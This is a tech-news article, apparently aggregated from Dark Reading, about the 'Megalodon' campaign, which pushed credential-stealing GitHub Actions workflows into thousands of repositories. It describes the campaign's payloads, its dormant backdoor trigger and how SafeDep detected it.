Skip to content
Tech News
← Back to articles

Feeding Frenzy: 'Megalodon' Malware Infects Thousands of GitHub Repos

2026-05-26 | original
read original get GitHub Security Scanner → more articles
Why This Matters

The Megalodon malware campaign highlights the ongoing vulnerabilities in the software supply chain, especially within popular platforms like GitHub. Its sophisticated methods of stealth and credential theft pose significant risks to developers, organizations, and consumers relying on open-source code. This underscores the urgent need for enhanced security measures and vigilance in software development and distribution.

Key Takeaways

Thousands of GitHub repositories were poisoned with credential-stealing malware in the latest threat campaign to rock the beleaguered software supply chain.

In a May 21 blog post, cybersecurity startup SafeDep flagged an automated malware campaign, codenamed "Megalodon," that unfolded on May 18 in a six-hour window. In that brief amount of time, Megalodon managed to push 5,718 malicious commits to 5,561 GitHub repositories.

According to SafeDep, a threat actor used dummy accounts and forged author identities to inject GitHub Actions workflows with malicious payloads that exfiltrate CI/CD secrets, cloud credentials, SSH keys, OpenID Connect tokens, and source code secrets to a command-and-control (C2) server.

The Megalodon campaign follows a series of attacks this year that have seemingly spread at a rapid pace and upended the software supply chain.

Supply Chain Shark Hunts for Secrets

Megalodon is composed of two payloads, according to SafeDep. The primary malware adds a malicious YAML file named "SysDiag" that adds a new workflow whenever a push or pull request is made. The more targeted, secondary payload replaces existing workflows with a "workflow-dispatch" trigger that acts as stealth backdoor that evades detection and doesn't generate visible CI runs until activated.

Related:The Hackers Behind Shai-Hulud: Lucky or Skilled?

"This makes the backdoor dormant. It creates no visible runs in the Actions tab, no failed builds, no red flags in CI history," the company stated in its blog, adding that an attacker can activate the backdoor through a GitHub API.

SafeDep first spotted Megalodon when the company's Malysis engine detected malicious activity in a bundled GitHub Actions workflow file for an npm package, @tiledesk/[email protected], part of the open source chatbot platform Tiledesk. It turned out that Tiledesk had nine repositories that were backdoored, and the maintainers unknowingly published poisoned code to downstream users, inadvertently spreading Megalodon infections.

It's unclear why the campaign lasted only six hours. Abhisek Datta, security engineer at SafeDep, tells Dark Reading that the research team didn't observe any time limitation behavior in the analysis of Megalodon.

... continue reading

Explore topics: github megadlon ci/cd safedep supply chain
Related:
Stack Overflow's forum is dead thanks to AI
GitHub Actions down again today
This sharing app brings Quick Share support to Android phones without Google services
Laravel Lang packages hijacked to deploy credential-stealing malware
The FBI Wants 'Near Real-Time' Access to US License Plate Readers

© 2026 GoKawiil

About | Editorial Policy | Contact